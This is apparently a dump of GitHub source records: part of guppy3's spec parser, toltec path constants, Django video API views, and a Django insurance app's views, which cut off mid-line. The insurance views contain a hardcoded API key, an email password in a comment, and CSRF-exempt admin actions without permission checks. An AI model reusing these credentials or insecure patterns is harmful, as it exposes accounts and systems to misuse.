textpos)\n colonpos = tag.find(':', 0, textpos)\n if equpos != -1 and (colonpos == -1 or equpos < colonpos):\n tag, arg = (tag[:equpos].strip()+'=',\n tag[equpos+1:].strip())\n else:\n if colonpos == -1:\n if not ' ' in tag[:textpos] or textpos >= len(tag.rstrip()):\n colonpos = textpos\n else:\n raise SyntaxError(\n 'No colon in spaced tag in node %s' % dtree)\n tag, arg = (tag[:colonpos].strip(),\n tag[colonpos+1:]\n )\n if tag in self.node_aliases:\n tag = self.node_aliases[tag]\n tag = tag.replace(' ', '_')\n if tag != 'text' and not src.nostrip:\n arg = arg.strip()\n\n children = self.nodes_of_dforest(dtree.children, src)\n return self.node_of_taci(tag, arg, children, dtree.index, src)\n\n def nodes_of_dforest(self, dforest, src):\n onodes = [self.node_of_dtree(c, src) for c in dforest]\n nodes = []\n for node in onodes:\n if node.tag != 'include':\n nodes.append(node)\n continue\n filename = node.arg.strip()\n filename = self.os.path.join(self.os.path.dirname(src.filename),\n filename)\n node = self.node_of_file(filename, nostrip=src.nostrip)\n nodes.extend(node.children)\n return tuple(nodes)\n\n def _get_node_of_taci(self):\n return SpecNode\n\n def node_of_tatci(self, tag, arg, text, children=(), index=0, src=None):\n if text:\n if tag == 'text':\n if arg:\n arg = arg + '\\n' + text\n else:\n arg = text\n else:\n children = (self.node_of_taci(\n 'text', text, (), index, src),) + children\n return self.node_of_taci(tag, arg, children, index, src)\n\n def node_of_text(self, text):\n # Returns a node that is either\n # - a 'text' node, if text was all ascii\n # - a 'char' node, if text was a single non-ascii\n # - a 'block' with children being a sequence of char and text nodes,\n # if text contained ascii and non-ascii characters\n nodes = self.nodes_of_text(text)\n if len(nodes) == 1:\n return nodes[0]\n else:\n return self.node_of_taci('block', '', nodes)\n\n def nodes_of_text(self, text):\n # Returns a sequence of nodes, encoding text.\n nodes = []\n if self.is_not_ascii(text):\n chars = []\n for char in text:\n no = ord(char)\n if no < 128:\n chars.append(char)\n else:\n if chars:\n nodes.append(self.node_of_taci('text', ''.join(chars)))\n chars = []\n nodes.append(self.node_of_taci('char', str(no)))\n if chars:\n nodes.append(self.node_of_taci('text', ''.join(chars)))\n else:\n nodes.append(self.node_of_taci('text', text))\n return nodes\n\n def main(self):\n root = self._root\n\n specdir = root.os.path.join(\n root.os.path.dirname(root.os.path.realpath(__file__)),\n '../../specs')\n main_dt_name = root.os.path.join(specdir, \"docexample.gsl\")\n if not root.os.path.exists(main_dt_name):\n print('%s does not exist, skipping test' % main_dt_name)\n return\n\n env = self.SpecEnv(self)\n\n node = self.node_of_file(main_dt_name)\n node.accept(env)\n\n def print_doc(self, dt):\n self.print_doc()\n\n def unparse_head(self, level, tag, arg, text):\n head = tag\n if arg:\n head = head + ': ' + arg\n if text:\n head = head + '\\n' + text\n tag = self.DottedTree.unparse_tag(level, head)\n return tag\n\n\ndef test_main():\n from guppy import Root\n root = Root()\n\n root.guppy.gsl.SpecNodes.main()\n","repo_name":"zhuyifei1999/guppy3","sub_path":"guppy/gsl/SpecNodes.py","file_name":"SpecNodes.py","file_ext":"py","file_size_in_byte":18920,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"21"} +{"seq_id":"34356836331","text":"import os\n\n# Root directory where this clone of the Toltec repo lives\nGIT_DIR = os.path.normpath(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\n# Directory where the tooling scripts are stored\nSCRIPTS_DIR = os.path.normpath(os.path.join(os.path.dirname(__file__), \"..\"))\n\n# Directory where recipes can be found\nRECIPE_DIR = os.path.join(GIT_DIR, \"package\")\n\n# Working directory for building recipes\nWORK_DIR = os.path.join(GIT_DIR, \"build\", \"package\")\n\n# Directory used for storing built packages\nREPO_DIR = os.path.join(GIT_DIR, \"build\", \"repo\")\n","repo_name":"toltec-dev/toltec","sub_path":"scripts/toltec/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":581,"dataset":"github-code","pt":"21"} +{"seq_id":"24378052850","text":"from django.http import JsonResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nimport shutil\nimport os\nfrom django.conf import settings\nfrom django.core.files.storage import default_storage\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework import filters\nfrom rest_framework import generics\n\nfrom api.models import Videos, Sessions, Cameras, CameraAngles, TypicalChild, AntypicalChild\nfrom api.serializers import VideosSerializer\n\n\n# get all videos for typical children\n@api_view(['GET'])\ndef allTVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.all().exclude(tChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n# get all videos of antypical children\n@api_view(['GET'])\ndef allATVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.all().exclude(atChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n# get all videos of a session\n@api_view(['GET'])\ndef sessionVideos(request, pk):\n session = Sessions.objects.get(id=pk)\n video_list = Videos.objects.filter(session__exact=session)\n serializer = VideosSerializer(video_list, many=True)\n return Response(serializer.data)\n\n\n# get all sliced videos of typical children\n@api_view(['GET'])\ndef allTSlicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=True).exclude(tChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n# get all sliced videos of atypical children\n@api_view(['GET'])\ndef allATSlicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=True).exclude(atChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n# get all unsliced videos of typical children\n@api_view(['GET'])\ndef allTUnslicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=False).exclude(tChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n# get all unsliced videos of typical children\n@api_view(['GET'])\ndef allATUnslicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=False).exclude(atChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n# filter values in all videos of typical children\nclass AllTVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.all().exclude(tChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in sliced videos of typical children\nclass SlicedTVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=True).exclude(tChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in unsliced videos of typical children\nclass UnslicedTVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=False).exclude(tChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in all videos of atypical children\nclass AllATVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.all().exclude(atChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in sliced videos of atypical children\nclass SlicedATVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=True).exclude(atChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in unsliced videos of atypical children\nclass UnslicedATVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=False).exclude(atChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n\n# get single video\n@api_view(['GET'])\ndef getVideo(request, pk):\n video = Videos.objects.get(id=pk)\n serializer = VideosSerializer(video, many=False)\n return Response(serializer.data)\n\n\n# get single video details\n@api_view(['GET'])\ndef getVideoInfo(request, pk):\n video = Videos.objects.get(id=pk)\n\n # get child\n child = None\n if not video.tChild == None:\n child = TypicalChild.objects.get(id=video.tChild.id)\n else:\n child = AntypicalChild.objects.get(id=video.atChild.id)\n \n # get session\n session = Sessions.objects.get(id=video.session.id)\n\n res = {\n 'child_name': child.name,\n 'session_date': session.date,\n 'camera': video.camera_name,\n 'camera_angle': video.camera_angle_name,\n 'duration': video.duration,\n 'file_type': video.file_type,\n 'file_extension': video.file_extension\n }\n\n if not video.tChild == None:\n res['child_unique_no'] = child.unique_no\n res['child_sequence_no'] = child.sequence_no\n else:\n res['child_clinic_no'] = child.clinic_no\n \n return Response(res)\n\n \n\n# add typical child video\n@api_view(['POST'])\ndef addTVideo(request):\n serializer = VideosSerializer(data=request.data)\n\n if serializer.is_valid():\n # set video name\n camera = Cameras.objects.get(id=request.data['camera'])\n camera_angle = CameraAngles.objects.get(id=request.data['camera_angle'])\n child = TypicalChild.objects.get(id=request.data['tChild'])\n session = Sessions.objects.get(id=request.data['session'])\n\n name = f'{child.unique_no}_{session.id}_{camera.name}'\n \n #set file extension\n file_type = request.data['file_type']\n file_extension = ''\n if not file_type == None: \n t = file_type.split('/')[1]\n if t == 'mp4':\n file_extension = '.mp4'\n elif t == 'x-matroska':\n file_extension = '.mkv'\n else:\n file_extension = '.mp4'\n\n serializer.save(name=name, camera_name=camera.name, camera_angle_name=camera_angle.name, file_extension=file_extension)\n else:\n print(serializer.errors)\n\n return Response(serializer.data)\n\n\n# add antypical child video\n@api_view(['POST'])\ndef addATVideo(request):\n print(request.data)\n serializer = VideosSerializer(data=request.data)\n\n if serializer.is_valid():\n # set video name\n camera = Cameras.objects.get(id=request.data['camera'])\n camera_angle = CameraAngles.objects.get(id=request.data['camera_angle'])\n child = AntypicalChild.objects.get(id=request.data['atChild'])\n session = Sessions.objects.get(id=request.data['session'])\n\n name = f'{child.clinic_no}_{session.id}_{camera.name}'\n \n #set file extension\n file_type = request.data['file_type']\n file_extension = ''\n if not file_type == None: \n t = file_type.split('/')[1]\n if t == 'mp4':\n file_extension = '.mp4'\n elif t == 'x-matroska':\n file_extension = '.mkv'\n else:\n file_extension = '.mp4'\n\n serializer.save(name=name, camera_name=camera.name, camera_angle_name=camera_angle.name, file_extension=file_extension)\n else:\n print(serializer.errors)\n\n return Response(serializer.data)\n\n\n# update video\n@api_view(['PUT'])\ndef updateVideo(request, pk):\n print(request.data)\n video = Videos.objects.get(id=pk)\n serializer = VideosSerializer(data=request.data, instance=video)\n\n if serializer.is_valid():\n serializer.save()\n else:\n print(serializer.errors)\n\n return Response(serializer.data)\n\n\n# delete a video\n@api_view(['DELETE'])\ndef deleteVideo(request, pk):\n video = Videos.objects.get(id=pk)\n res = ''\n\n try:\n video.delete()\n res += 'video record was deleted. '\n if video.video:\n if default_storage.exists(video.video.path):\n default_storage.delete(video.video.path)\n res += 'video file was deleted. '\n if video.thumbnail:\n if default_storage.exists(video.thumbnail.path):\n default_storage.delete(video.thumbnail.path)\n res += 'video thumbnail was deleted. '\n except:\n res = 'error, something went wrong!'\n\n return Response(res)\n\n\n# delete all videos\n@api_view(['DELETE'])\ndef deleteVideos(request):\n videos = Videos.objects.all()\n res = ''\n \n try:\n for v in videos:\n v.delete()\n if v.video:\n if default_storage.exists(v.video.path):\n default_storage.delete(v.video.path)\n if video.thumbnail:\n if default_storage.exists(v.thumbnail.path):\n default_storage.delete(v.thumbnail.path)\n res = 'all Videos were deleted(records, video files, thumbnails)'\n except:\n res = 'error, something went wrong!'\n\n return Response(res)","repo_name":"SachinAthu/CSAAT-dev","sub_path":"backend/api/views/videos_views.py","file_name":"videos_views.py","file_ext":"py","file_size_in_byte":11283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25728863162","text":"import os\nimport pandas\nfrom .classes import *\nfrom django.contrib import auth\nfrom .forms import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate\nfrom .forms import SignupForm\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom .tokens import account_activation_token\nfrom django.contrib.auth.models import User\nfrom django.core.mail import EmailMessage\nimport threading\nfrom .processor import Processor\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\n\ndef index(request):\n # companu = CompanyInfo.objects.get(IM_NUMIDENT=20693867)\n # tmp=Order(user=request.user, company_info=companu, reporting_date='2020-06-21', calc_type='1', offered=True)\n # tmp.save()\n companies = Company.objects.all()\n template = loader.get_template('insurance_app/index.html')\n context = {\n 'companies': companies,\n }\n company_code = \"19209435\"\n api_key = \"VChFavBht5ug\"\n return HttpResponse(template.render(context, request))\n\ndef choose_company(request):\n template1 = loader.get_template('insurance_app/choose_company.html')\n company_user = CompanyUser.objects.filter(user=request.user)\n print(company_user)\n if company_user:\n context = {'company_user': company_user}\n return HttpResponse(template1.render(context, request))\n else:\n return render(request, 'insurance_app/choose_company_info.html')\n\ndef company_is_chosen(request, IM_NUMIDENT):\n template1 = loader.get_template('insurance_app/text_page.html')\n request.session['company_IM_NUMIDENT'] = IM_NUMIDENT\n company = Company.objects.filter(IM_NUMIDENT=IM_NUMIDENT).last()\n context = {'text': 'Ви увійшли у компанію '+ company.IAN_FULL_NAME}\n return HttpResponse(template1.render(context, request))\n\ndef company_logout(request, IM_NUMIDENT):\n template1 = loader.get_template('insurance_app/text_page.html')\n request.session['company_IM_NUMIDENT'] = None\n company = Company.objects.filter(IM_NUMIDENT=IM_NUMIDENT).last()\n context = {'text': 'Ви вийшли з компанії '+ company.IAN_FULL_NAME}\n return HttpResponse(template1.render(context, request))\n\ndef company_list(request):\n user = request.user\n try:\n user_companies = CompanyUser.objects.filter(user=user)\n except:\n user_companies = None\n try:\n company_docs = Documents.objects.filter(user=user, type_of_contract = 'contract')\n except:\n company_docs = None\n try:\n session_company = request.session['company_IM_NUMIDENT']\n print(session_company)\n except:\n session_company = None\n return render(request, 'insurance_app/company_list.html', {'user_companies': user_companies,\n 'session_company': session_company,\n 'company_docs': company_docs})\n\n@csrf_exempt\ndef add_info_to_company(request, company_IM_NUMIDENT):\n db_obj = DatabaseAccess()\n user = request.user\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = company_IM_NUMIDENT)\n address = request.POST['info_address']\n bank_props = request.POST['bank_props']\n position = request.POST['position']\n pib = request.POST['pib']\n action_base = request.POST['action_base']\n db_obj.insert_change_request(user, company_info, address, bank_props, position, pib, action_base)\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Запит на зміну інформації про компанію ' + company_info.IAN_FULL_NAME + ' був відправлений адміністратору'}\n return HttpResponse(template1.render(context, request))\n\ndef company_detail(request, company_IM_NUMIDENT):\n last_date = Company.objects.last().update_date\n str_last_date = last_date.strftime(\"%d-%m-%Y %H:%M\")\n user_flag = False\n user = request.user\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = company_IM_NUMIDENT)\n form1 = AddInfoToCompany(instance=company_info)\n try:\n company = Company.objects.get(IM_NUMIDENT=company_IM_NUMIDENT, update_date=last_date)\n rows = CompanyUser.objects.filter(user=user)\n for row in rows:\n if row.company_info.IM_NUMIDENT == company.IM_NUMIDENT:\n user_flag = True\n except ObjectDoesNotExist:\n company = None\n return render(request, 'insurance_app/company_detail.html', {'company': company, 'user_flag': user_flag, 'str_last_date':str_last_date, 'form1':form1})\n\n@csrf_exempt\ndef update_database(request):\n if request.is_ajax() and request.method == 'POST':\n alert_data = request.POST[\"alert_data\"]\n if int(alert_data) > 7:\n processor = Processor()\n thread = threading.Thread(target=processor.update_company)\n thread.start()\n return JsonResponse({'context': 'База даних компаній буде оновлена'})\n elif alert_data.strip() == 'None':\n processor = Processor()\n thread = threading.Thread(target=processor.load_company)\n thread.start()\n return JsonResponse({'context': 'База даних компаній буде завантажена'})\n else:\n return JsonResponse({'context': 'База даних компаній НЕ буде оновлена'})\n\n@csrf_exempt\ndef accept_chosen_request(request):\n request_id = request.POST.get('request_id')\n confirm_request = Request.objects.get(id = request_id)\n confirm_request.confirm=True\n confirm_request.save()\n return JsonResponse({})\n\n@csrf_exempt\ndef accept_all_request(request):\n requests = Request.objects.all()\n for request in requests:\n if request.confirm == False:\n request.confirm=True\n request.save()\n return JsonResponse({})\n\n@csrf_exempt\ndef load_to_database(request):\n db_obj = DatabaseAccess()\n db_obj.update_company_user()\n return JsonResponse({})\n\ndef check_requests():\n flag=True\n rows = Request.objects.all()\n for row in rows:\n if row.confirm==False:\n flag=False\n break\n return flag\n\ndef admin_page(request):\n user = request.user\n admin = user.is_superuser\n db_obj = DatabaseAccess()\n try:\n data = db_obj.get_update_data()\n now = timezone.now()\n alert_data = (now - data).days\n except:\n alert_data = None\n requests = Request.objects.all()\n template = loader.get_template('insurance_app/admin_page.html')\n check_requests_flag = check_requests()\n print(dir(requests))\n context = {\n 'admin': admin,\n 'requests': requests,\n 'check_requests_flag' : check_requests_flag,\n 'alert_data': alert_data,\n }\n return HttpResponse(template.render(context, request))\n\ndef admin_page_contract(request):\n user = request.user\n admin = user.is_superuser\n docs = Documents.objects.all()\n template = loader.get_template('insurance_app/admin_page_contract.html')\n context = {\n 'admin': admin,\n 'docs': docs,\n }\n return HttpResponse(template.render(context, request))\n\ndef received_contract_act(request, doc_id):\n user = request.user\n doc = Documents.objects.get(id=doc_id)\n if request.POST:\n file_location_received = request.POST['file_location_received']\n doc.file_location_received = file_location_received\n doc.received = True\n doc.signed_by_client = True\n doc.save()\n return redirect('insurance_app:admin_page_contract')\n else:\n doc_form = DocContractActForm()\n template = loader.get_template('insurance_app/received_contract_act.html')\n context = {\n 'doc':doc,\n 'user':user,\n 'doc_form': doc_form,\n }\n return HttpResponse(template.render(context, request))\n\ndef received_bill(request, doc_id):\n user = request.user\n doc = Documents.objects.get(id=doc_id)\n if request.POST:\n file_location_received = request.POST['file_location_received']\n current_payment_amount = request.POST['current_payment_amount']\n doc.file_location_received = file_location_received\n doc.current_payment_amount = current_payment_amount\n doc.received = True\n doc.signed_by_client = True\n if float(current_payment_amount) >= doc.full_payment_amount:\n doc.paid_in_full = True\n doc.save()\n return redirect('insurance_app:admin_page_contract')\n else:\n doc_form = DocBillForm()\n template = loader.get_template('insurance_app/received_bill.html')\n context = {\n 'doc':doc,\n 'user':user,\n 'doc_form': doc_form,\n }\n return HttpResponse(template.render(context, request))\n\ndef add_company(request):\n user = request.user\n template = loader.get_template('insurance_app/add_company.html')\n if request.method == \"POST\":\n pass\n else:\n form3 = AddCompanyForm()\n form4 = DeleteCompanyForm()\n form4.fields['company']._set_queryset(CompanyUser.objects.filter(user = user))\n context = {\n 'user' : user,\n 'form3': form3,\n 'form4': form4,\n }\n return HttpResponse(template.render(context, request))\n\ndef user_page(request):\n user = request.user\n template = loader.get_template('insurance_app/user_page.html')\n if request.method == \"POST\":\n form1 = UserUpdateForm(request.POST,instance=user)\n form2 = UserProfileForm(request.POST,instance=user.userprofile)\n if form1.is_valid() and form2.is_valid():\n post1 = form1.save(commit=False)\n post2 = form2.save(commit=False)\n post1.save()\n post2.save()\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Данні аккаунта було успішно змінено '}\n return HttpResponse(template1.render(context, request))\n else:\n form1 = UserUpdateForm(instance=user)\n form2 = UserProfileForm(instance=user.userprofile)\n context = {\n 'user' : user,\n 'form1': form1,\n 'form2': form2,\n }\n return HttpResponse(template.render(context, request))\n\ndef create_contract(request, IM_NUMIDENT):\n print(IM_NUMIDENT)\n user = request.user\n template = loader.get_template('insurance_app/create_contract.html')\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = IM_NUMIDENT)\n if request.POST:\n with open('insurance_app/contract_files_sended/contract_'+IM_NUMIDENT+'.txt', 'w') as f:\n f.write(\"DOC\"+IM_NUMIDENT)\n user = request.user\n user_email = user.email\n mail_subject = 'Договір '\n filepath_result = 'insurance_app/contract_files_sended/contract_'+IM_NUMIDENT+'.txt'\n message = render_to_string('insurance_app/send_result.html', {\n 'user': user,\n 'domain': settings.DEFAULT_DOMAIN,\n })\n email = EmailMessage(\n mail_subject, message, to=[user_email]\n )\n email.attach_file(filepath_result)\n email.send()\n tmp = Documents.objects.get(company_info = company_info, type_of_contract = 'contract')\n tmp.signed_by_us = True\n tmp.sended = True\n tmp.file_location_sended = 'insurance_app/contract_files_sended/contract_'+IM_NUMIDENT+'.txt'\n tmp.save()\n return redirect('insurance_app:index')\n else:\n context = {'IM_NUMIDENT': IM_NUMIDENT,\n 'company_info': company_info}\n return HttpResponse(template.render(context, request))\n\n@csrf_exempt\ndef add_chosen_company(request):\n create_contract_flag = False\n db_obj = DatabaseAccess()\n user = request.user\n choice_id = request.POST['company']\n current_company = Company.objects.get(id=choice_id)\n try:\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = current_company.IM_NUMIDENT)\n except:\n db_obj.create_company_info(current_company.IM_NUMIDENT, current_company.IAN_FULL_NAME)\n company_info = CompanyInfo.objects.get(IM_NUMIDENT=current_company.IM_NUMIDENT)\n try:\n contract_get = Documents.objects.get(company_info = company_info, type_of_contract = 'contract')\n except:\n tmp = Documents(user=user, company_info=company_info, type_of_contract=\"contract\")\n tmp.save()\n create_contract_flag = True\n print(tmp)\n db_obj.insert_request(user, company_info, 'add')\n IM_NUMIDENT = company_info.IM_NUMIDENT\n print('Action \"add\" is added to requests table')\n if create_contract_flag:\n return redirect('insurance_app:create_contract', IM_NUMIDENT = IM_NUMIDENT)\n else:\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Запит на додання компанії ' + current_company.IAN_FULL_NAME + ' був відправлений адміністратору'}\n return HttpResponse(template1.render(context, request))\n\n@csrf_exempt\ndef delete_chosen_company(request):\n db_obj = DatabaseAccess()\n choice_id = request.POST['company']\n company_info = CompanyUser.objects.get(id=choice_id).company_info\n user = request.user\n # fromaddr = 'strahovka.work2020@gmail.com'\n # toaddr = auth_user.email\n # toaddr = current_company.email\n\n # username = 'strahovka.work2020@gmail.com'\n # password = 'cdnblpUYBvdlH8'\n # server = smtplib.SMTP('smtp.gmail.com:587')\n db_obj.insert_request(user, company_info, 'delete')\n print('Action \"delete\" is added to requests table')\n # server.starttls()\n # server.login(username, password)\n # msg1 = 'Потвердите что вашу компанию обслуживает ' + str(site_user.first_name)\n # msg2 = 'Confirm that you want to add this company' + str(current_company.IAN_FULL_NAME) + str(\n # current_company.IM_NUMIDENT)\n # server.sendmail(fromaddr, toaddr, msg2.encode(\"utf8\"))\n # server.quit()\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Запит на видалення компанії ' + company_info.IAN_FULL_NAME + ' був відправлений адміністратору'}\n return HttpResponse(template1.render(context, request))\n\ndef update_company(request):\n db_obj = DatabaseAccess()\n obj = Updates()\n modify_obj = DataModify()\n try:\n data = db_obj.get_update_data()\n now = timezone.now()\n print((now - data).days)\n if (now - data).days < 7:\n print(1)\n tuple_obj = obj.parser()\n rows = Company.objects.filter(update_date = data)\n modify_obj.modify_company(tuple_obj[0])\n obj.compare(rows, tuple_obj[0])\n print(db_obj.upload_companies(tuple_obj[0]) + '1')\n else: return HttpResponse(\"Not updated\")\n except AttributeError:\n print(2)\n tuple_obj = obj.parser()\n modify_obj.modify_company(tuple_obj[0])\n print(db_obj.upload_companies(tuple_obj[0]) + '2')\n return HttpResponse(\"Updated\")\n\ndef logout(request):\n auth.logout(request)\n return redirect('insurance_app:index')\n\ndef register(request):\n if request.method == 'POST':\n form1 = SignupForm(request.POST)\n if form1.is_valid():\n user = form1.save(commit=False)\n user.is_active = False\n user.save()\n current_site = get_current_site(request)\n mail_subject = 'Активация вашего аккаунта'\n message = render_to_string('insurance_app/acc_active_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n 'uid':urlsafe_base64_encode(force_bytes(user.pk)),\n 'token':account_activation_token.make_token(user),\n })\n to_email = form1.cleaned_data.get('email')\n domain = to_email.split('@')[1]\n email = EmailMessage(\n mail_subject, message, to=[to_email]\n )\n email.send()\n return render(request, 'insurance_app/activate_account.html', {'domain':domain})\n else:\n form1 = SignupForm()\n return render(request, 'insurance_app/register.html', {'form1': form1})\n\ndef activate(request, uidb64, token):\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n form = UserProfileForm({'user': user})\n post = form.save()\n post.save()\n login(request, user)\n return redirect('insurance_app:add_userprofile')\n else:\n return HttpResponse('Activation link is invalid!')\n\ndef add_userprofile(request):\n\n if request.method == 'POST':\n user = request.user\n form = UserProfileForm(request.POST, instance=user.userprofile)\n if form.is_valid():\n post1 = form.save(commit=False)\n post1.save()\n return redirect('insurance_app:index')\n else:\n user = request.user\n try:\n form = UserProfileForm(instance=user.userprofile)\n except: form = None\n return render(request, 'insurance_app/add_userprofile.html', {'form': form})\n\ndef auto_insurance(request):\n form = AutoInsurance()\n return render(request, 'insurance_app/auto_insurance.html', {'form': form})\n\n@csrf_exempt\ndef auto_fill(request):\n number = request.POST[\"number\"]\n update_obj = Updates()\n context = update_obj.gai(number)\n return JsonResponse({'context':context})\n\ndef order(request,order_id):\n template = loader.get_template('insurance_app/order.html')\n try:\n session_order_company = request.session['company_IM_NUMIDENT']\n session_company = CompanyInfo.objects.get(IM_NUMIDENT = session_order_company)\n except:\n session_company = None\n user = request.user\n print(session_company)\n if session_company:\n user_orders_offered = Order.objects.order_by(\"-order_date\").filter(user=user, company_info = session_company,\n offered=True, rejected=False,active=False)\n user_orders = Order.objects.order_by(\"-order_date\").filter(user=user, company_info=session_company,active=True)\n print(user_orders_offered)\n if len(user_orders_offered) > 3:\n user_orders_offered3 = Order.objects.order_by(\"-order_date\").filter(user=user, company_info = session_company,\n offered=True, rejected=False, active=False)[:3]\n else: user_orders_offered3 = []\n else:\n user_orders_offered = []\n user_orders = []\n user_orders_offered3 = []\n if request.POST:\n print(request.POST)\n db_obj = DatabaseAccess()\n choice_id = request.session['company_IM_NUMIDENT']\n print(choice_id)\n company_info = CompanyInfo.objects.get(IM_NUMIDENT=choice_id)\n user = request.user\n reporting_date = request.POST['reporting_date']\n calc_type = request.POST['calc_type']\n new_calc_type, order = db_obj.find_offered_order(user, company_info, reporting_date, calc_type)\n if not new_calc_type:\n order = db_obj.insert_order(user, company_info, reporting_date, calc_type)\n file_path = \"insurance_app/xlsx_files/r3_\"+choice_id+\".xlsx\"\n print('XXX')\n print(calc_type)\n print(type(calc_type))\n if calc_type == '1':\n print(calc_type)\n print(os.listdir)\n print(os.path.exists(file_path))\n if os.path.exists(file_path):\n print(\"KKK\")\n return redirect('insurance_app:show_count_result', order_id = order.id)\n else:\n return redirect('insurance_app:show_count_error', order_id=order.id, reason='not_enough_data')\n else:\n return redirect('insurance_app:order', 0)\n else:\n if order_id == 0:\n form = OrderForm()\n order = 0\n elif order_id!=0:\n try:\n order = Order.objects.get(id=order_id)\n print(order.company_info.IAN_FULL_NAME)\n if order.user == user and order.company_info.IM_NUMIDENT == session_order_company:\n form = OrderForm({'reporting_date': str(order.reporting_date), 'calc_type': str(order.calc_type)})\n else:\n form = None\n order = None\n except:\n form = None\n order = None\n context = {\n 'form': form,\n 'order': order,\n 'user_orders': user_orders,\n 'user_orders_offered':user_orders_offered,\n 'user_orders_offered3': user_orders_offered3,\n 'session_company': session_company,\n }\n return HttpResponse(template.render(context, request))\n\ndef show_count_result(request, order_id):\n template = loader.get_template('insurance_app/show_count_result.html')\n if request.POST:\n order = Order.objects.get(id=order_id)\n doc_act = Documents.objects.get(order_id=order_id, type_of_contract = 'act')\n doc_act.sended = True\n doc_act.save()\n doc_bill= Documents.objects.get(order_id=order_id, type_of_contract = 'bill')\n doc_bill.sended = True\n doc_bill.save()\n filepath_act = doc_act.file_location_sended\n filepath_bill = doc_bill.file_location_sended\n order.accepted = True\n order.save()\n user = request.user\n user_email 